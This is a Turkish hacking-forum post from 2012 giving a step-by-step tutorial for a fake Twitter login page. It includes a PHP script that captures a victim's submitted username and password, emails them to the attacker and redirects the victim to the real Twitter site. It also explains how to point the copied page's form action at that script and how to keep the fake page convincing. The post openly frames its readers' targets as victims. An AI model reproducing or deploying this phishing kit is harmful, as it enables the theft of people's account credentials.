Henüz Üye Degilmisin ? Üye Ol | Parolamı Unuttum
Paneli Kapat
SANALGUCLULER Hack ve Güvenlik Platformu  

Post Adresi Olmadan Fake Yapımı

- En büyük sebebi kurbanımız fake sayfamıza giriş yapıp onayladığında kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor. Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok. -------------------------------------------------------------------------------- Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum 1) sayfa kaynak kodlarını koplayıp kaydediyoruz

AnaSayfa Kimler Online Bugünki Mesajlar Forumları Okundu Kabul Et
Go Back   SANALGUCLULER Hack ve Güvenlik Platformu > Mail Güvenlik Açıkları

Yeni Konu aç  Cevapla
 
LinkBack Seçenekler Stil
Alt 15 Ocak 2012, 11:57   #1
Mareşal
Ceybi Nickli Üyenin Kullanıcı Resmi (Avatar)
Üyelik Tarihi: 12 Ocak 2012
Mesajlar: 789
Rep Puanı : 10
Rep Derecesi : Ceybi isimli üye Tecrübe puanını kapatmıştır.
Standart Post Adresi Olmadan Fake Yapımı

- En büyük sebebi kurbanımız fake sayfamıza giriş yapıp onayladığında
kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor.
Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok.
--------------------------------------------------------------------------------
Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum

1) sayfa kaynak kodlarını koplayıp kaydediyoruz
2) sayfa içinde ( form method veya form action ) kodlarını buluyoruz
3) Bu alanı post adresimize yönlendiriyoruz

Bunu Twitter için örnekleyelim örnek üzerinde daha iyi anlaşılır.

1) Bizim yapacağımız işlemde ise post adresi yerine bi php sayfası koyarak bu işi halletmek
öncelikle bi metin belgesi açıyoruz ve
PHP- Kodu:
<?php
$kime
="mail adresiniz";
$baslik="Twiter Sifreleri";
$yonlendir="http://twitter.com/";
$Crim="UserName : ".$_POST[&#8217;User1’]."\\r\\n"."şifre : ".$_POST[’pass1’]."\\r\\n";
echo &#8217;<script>window.location.href = "’ . $yonlendir . ’";</script>’; 
mail($kime$baslik$Crim)
?>
Bu kodları yapıstırıp .php uzantıyla kaydediyorsunuz

2) Twitterin kaynak kodlarını indiriyoruz ve kodları bir txt editör ile açıyoruz

3) ctrl-f tuşlarına basarak arama çubuğundan ( form action veya form method ) u buluyoruz.
twitterde form action var bunu kullanacağız.

4) Şimdi buradaki bilgileri gönderdiği yeri silerek buraya gönder.php adlı sayfamızın adresini yazıyoruz
örn=
PHP- Kodu:
<form action="http://www.frukocuk.com/gonder.php" class="signup signup-btn" method="post"
gibi

5) 4. aşamayı yapabilmek için gonder.php yi ftp sunucumuza göndermemiz gerekmektedir.

Not: bu işlemleri yaptığımızda sayfanın karakter yapısı bozulmaktadır yani türkçe karakterler bozuk çıkmaktadır
bu olayı göz ardı etmeyip inandırıcılığı kaybetmemek için onları elinizde düzeltmeniz gerekecektir.
Ceybi isimli Üye şuanda  online konumundadır   Alıntı ile Cevapla

Sponsor Linkler (Lütfen Sitemize Destek Olmak İçin Günde Bir Kez Tıklayınız)
Cevapla

Paylaş

Etiketler
adresi, fake, fake yapımı, olmadan, post, post adresi, yapimi

Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Açan Forum Cevap Son Mesaj
Visual Basic te Tv Programı Yapımı aCCiLLeS Visual Basic 0 29 Ocak 2012 16:15
Parlayan Çizgi Yapımı Ceybi Photoshop 0 28 Ocak 2012 02:43
Abstract Efekt Yapımı Ceybi Photoshop 0 28 Ocak 2012 02:41
Abstract Efekt Yapımı Ceybi Photoshop 0 28 Ocak 2012 02:40
Fake MaiL İçin Önlemler Ceybi Mail Güvenlik Açıkları 0 18 Ocak 2012 18:00


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 13:00.


"İnsanları da Kağıt Paralar Gibi Güneş'e Tutunuz, İçlerinde Atatürk Yoksa Sahtedirler ..."
Sitemiz bir forum sitesi olduğu için kullanıcılar paylaşımlarını önceden onay almadan anında siteye yazabilmektedir. Bu yazılardan dolayı doğabilecek her türlü sorumluluk yazan kullanıcılara aittir. Yinede sitemizde yasalara aykırı unsurlar bulursanız admin[at]sanalgucluler[dot]com iletisim adresine bildirebilirsiniz, şikayetiniz incelenip en kısa sürede gereken yapılır.
Alemin Kralı, Alexa, Altavista, Android, Android, Apple ios, Apple Iphone, ASP-.NET, Astroloji, Bada, Blackberry, Blackberry Os, C#, C/C++, Çin Malı Telefonlar, Counter Strike, CSS, Delphi, DMOZ, Eklentiler (Hack-Plugins), Ekonomi, Fatmagül’ün Suçu Ne?, Firar, Google Adsense, Google Adwords, Google Analytics, Google Pagerank, Google Translate, Güvenlik Programları, Hayat Devam Ediyor, HTC, HTML-XHTML, Java, JavaScript & AJAX, Kamera Şakaları, Karahan Online, Kaza Videoları, Knight OnLine, Komik Videolar, Kurtlar Vadisi Pusu, Kuzey Güney, Kültür Sanat, Linux, MAC-OS, Maemo, Magazin, Metin2, Mobil, Moderatör Başvuruları, Motorola, Muck, Muhteşem Yüzyıl, Nokia, Ogame, Palm Os, Pardus, PHP, Pis Yedili, Planet, Python, Sağlık, Samsung, Ses&Video Programları, Siemens, Silkroad Online, Sinema, Sonyericsson, Sorularınız ve Cevapları, Spor, Symbian, Sürücü&Driver, Tasarım Programları, Teknoloji, Travian, Tv Rehberi, Unix, vBulletin Temaları, Visual Basic, Windows, Windows Mobile, WolfTeam, World of Warcraft, WPF/WCF, XML/XSLT, Yahoo, Yalan Dünya, Yer Gök Aşk, İlginç Videolar, İnternet Programları, İstanbul Kıyamet Vakti, Öyle Bir Geçer Zamanki
I Love You Google

Search Engine Optimization by vBSEO 3.6.0